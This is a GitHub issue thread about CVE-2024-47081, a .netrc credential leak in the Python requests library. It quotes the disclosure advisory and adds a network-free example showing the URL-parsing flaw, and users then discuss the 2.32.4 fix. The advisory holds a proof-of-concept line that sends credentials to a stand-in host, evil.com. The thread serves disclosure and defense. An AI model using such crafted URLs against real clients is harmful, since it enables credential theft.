CVE-2024-47081: Netrc credential leak in PSF requests library
There does not yet seem to be an issue or an advisory about CVE-2024-47081, which was recently disclosed on seclists.org - I'm thus copying the advisory here:
From: Juho Forsén via Fulldisclosure <fulldisclosure () seclists org>
Date: Sat, 31 May 2025 06:30:50 +0000
The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc
credentials to third parties due to incorrect URL processing under specific conditions.
Issuing the following API call triggers the vulnerability:
requests.get('http://example.com:@evil.com/')
Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.
The root cause is
https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245
The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available.
CVE-2024-47081 has been reserved by GitHub for this issue.
As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access.
Link: https://seclists.org/fulldisclosure/2025/Jun/2
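The mechanism the advisory points at is a host-extraction mismatch: the netloc of `http://example.com:@evil.com/` is `example.com:@evil.com`, and splitting it on the first `:` (the way one strips a port) yields `example.com` for the credential lookup, while the connection actually goes to `evil.com`. The following is an added example, not code from the requests project or from the advisory author; it reproduces that discrepancy with only the standard library, uses a constructed in-memory table in place of a real `~/.netrc`, and makes no network or file access. The function names and the `credential_host_mismatch` check are this example's own.

```python
"""Added example for CVE-2024-47081 (not requests' code): shows why a host taken
from urlparse(url).netloc.split(":")[0] can differ from the host a request is
actually sent to, and a check that flags that mismatch before any credential
lookup happens. The netrc table below is constructed for the example."""
from typing import Optional, Tuple
from urllib.parse import urlparse

# Constructed stand-in for ~/.netrc: machine -> (login, password)
FAKE_NETRC = {
    "example.com": ("alice", "s3cr3t"),
}


def host_by_netloc_split(url: str) -> str:
    """The flawed extraction: everything before the first ':' in the netloc.

    Intended to strip a port ("example.com:8080" -> "example.com"), but it also
    truncates at the ':' of a "user:password@host" prefix, so the userinfo
    part is mistaken for the host.
    """
    return urlparse(url).netloc.split(":")[0]


def host_by_hostname(url: str) -> Optional[str]:
    """The sound extraction: urlparse's .hostname ignores userinfo and port."""
    return urlparse(url).hostname


def netrc_lookup(host: str) -> Optional[Tuple[str, str]]:
    """Return (login, password) for host from the constructed table, or None."""
    return FAKE_NETRC.get(host)


def credential_host_mismatch(url: str) -> bool:
    """Defensive check: would the flawed lookup select credentials for a host
    other than the one the request is actually sent to?"""
    return host_by_netloc_split(url) != host_by_hostname(url)


def main() -> None:
    for url in ("http://example.com/",
                "http://example.com:8080/",
                "http://example.com:@evil.com/"):
        lookup_host = host_by_netloc_split(url)
        connect_host = host_by_hostname(url)
        print(f"{url:32} lookup={lookup_host!r:15} connect={connect_host!r:12} "
              f"creds={netrc_lookup(lookup_host)} "
              f"mismatch={credential_host_mismatch(url)}")


if __name__ == "__main__":
    main()
```

Running it shows the port case resolving consistently while the `user:@host` case looks up `example.com`'s entry for a connection to `evil.com`; a client library should derive the netrc machine name from `.hostname`, and a caller who cannot upgrade can keep netrc out of the picture by passing explicit `auth=` on every call, as the advisory's workaround says.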
New release will come soon?
Looks like #6965 fixes this?
So... will we have a release that contains those fixes? 🤔
It's been more than a week already
Hi, please, is https://github.com/psf/requests/pull/6965 the fix for CVE-2024-47081?
Is there a fix for this yet?
Is there an ETA on the resolution for this? I have my pipelines being flagged due to the same.
2.32.4 has been released, which should address this CVE. Resolving now that the patch is available; you can read the public advisory here.
This issue does seem ongoing. Still getting the issue CVE-2024-47081 against version 2.32.4
I would contact your vendor, this isn't an issue with Requests.